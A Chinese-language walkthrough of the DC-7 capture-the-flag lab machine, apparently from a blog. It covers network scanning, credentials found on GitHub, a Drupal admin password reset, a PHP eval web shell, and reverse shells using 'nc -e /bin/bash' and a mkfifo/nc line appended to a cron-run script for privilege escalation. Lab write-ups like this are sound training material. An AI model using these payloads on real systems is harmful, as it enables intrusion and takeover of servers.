一、环境搭建

kali的靶攻击机IP地址：192.168.200.14

DC-7靶机的IP地址：暂时未知

注意：靶机和攻击机应处于一个网卡下

通过MAC地址判断靶机DC-7的IP 地址

二、信息收集

1、探索网段内存活的主机

第一种方式：

arp-scan -l 

第二种方式：

nmap -T4 -sP 192.168.200.0/24 -oN nmap200.sP

第三种方式：

netdiscover -i eth0 -r 192.168.200.0/24 #eth0代表网卡  -r代表网段

2、扫描站点开放的端口信息

nmap -p 1-65535 192.168.200.10 

开放的端口有80端口和22端口

3、扫描目录

4、网站指纹

第一种方式，可以安装火狐插件

第二种方式，在kali当中执行命令

whatweb -v 192.168.200.10

登陆网站，通过火狐插件可以知道网站使用的CMS是Drupal

当然，可以看到网站欢迎界面的英文信息

DC-7引入了一些“新”概念，但我让你来弄清楚它们是什么。：-）
虽然这个挑战并不完全是技术性的，但如果你需要诉诸暴力或字典攻击，你可能不会成功。
你要做的就是跳出框框思考。
盒子外面的路。：-）  #可知口令爆破是行不通的

三、漏洞测试

社工手段

百度搜索账户名

是github账户，点击进入

可以看到全是配置文件，然后从底部的英文翻译可以知道，找对地方了

得到数据库账户密码

账户名：dc7user
密码：MdR3xOgB7#dW
数据库名：Staff

几个可能的突破点：

1 网站首页的搜索框，尝试直接查询passwd等文件或直接输入linux命令查看，都以失败收尾；

2 尝试扫描网站目录，没发现什么有价值的目录，倒是发现了robotx.txt文件，这个文件作为常见的可以让爬虫程序扫描的文件之一，控制是否想让爬虫去爬取本站信息；

3 对于robots.txt文件，对里面的目录或者文件都进行了访问查看，未发现有用的信息

没啥有用的，从刚才的账号密码入手进行ssh连接，登陆成功之后，看看home目录下有什么其他账户的文件夹

ssh [email protected]

发现一个backups文件夹和一个mbox文件

进入backups文件夹，发现两个文件，但都是以gpg结尾的，gpg命令是用来加密文件的，加密后的文件都是乱码

进入mbox中发现脚本文件的路径

dc7user@dc-7:~$ cd /opt/scripts

dc7user@dc-7:/opt/scripts$ cat backups.sh 

主要信息：

Shell脚本文件 /opt/scripts/backups.sh

数据库文件：/home/dc7user/backups/website.sql

网站数据： /home/dc7user/backups/website.tar.gz

drush user-password admin --password="new_pass" 
#想要更改您的密码？就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin  123456为我修改的密码。
drush user-password admin --password="123456" 

网页都会存在一个admin账户，也可以在网页的登录界面进行尝试，提示修改成功

来到网站后台，使用admin/123456登录网站，成功登录

http://192.168.200.10/user/login

在Content—>Add content-->Basic page下，准备添加PHP代码反弹shell，但发现Drupal 8不支持PHP代码，百度后知道Drupal 8后为了安全，需要将php单独作为一个模块导入

php介绍页面如下，模块包下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

依次点击

安装完之后，跳转，然后点击激活

对该页面进行编辑，添加一句话PHP代码，并保存为PHP代码

<?php
@eval($POST[123]);
?>

欢迎页面是网站的首页，所以直接使用中国蚁剑连接网站，成功连接getshell

反弹SHELL

习惯性的反弹了一次shell到kali，在这里不反弹shell到kali下面也可以在蚁剑虚拟终端上做下面步骤

在kali监听6666端口，并反弹shell到kali，切换shell外壳

nc -e /bin/bash 192.168.200.14 6666
nc -lvvp 6666
python -c 'import pty;pty.spawn("/bin/bash")'

当前用户是www-data，在/opt/scripts目录下的backups.sh脚本文件所属组是www-data，所以www-data用户可以对这个脚本文件进行操作，并且这个脚本文件定时执行可以利用它来反弹shell

提权

写入反弹shell代码到backups.sh脚本文件中，并在kali监听8899端口，等待计划任务执行，稍微等待后成功getshell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.200.14 8899 >/tmp/f" >> backups.sh

nc -lvvp 8899

# 记得kali也要开启侦听

nc -lvvp 8899

等待之后....

获得flag

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）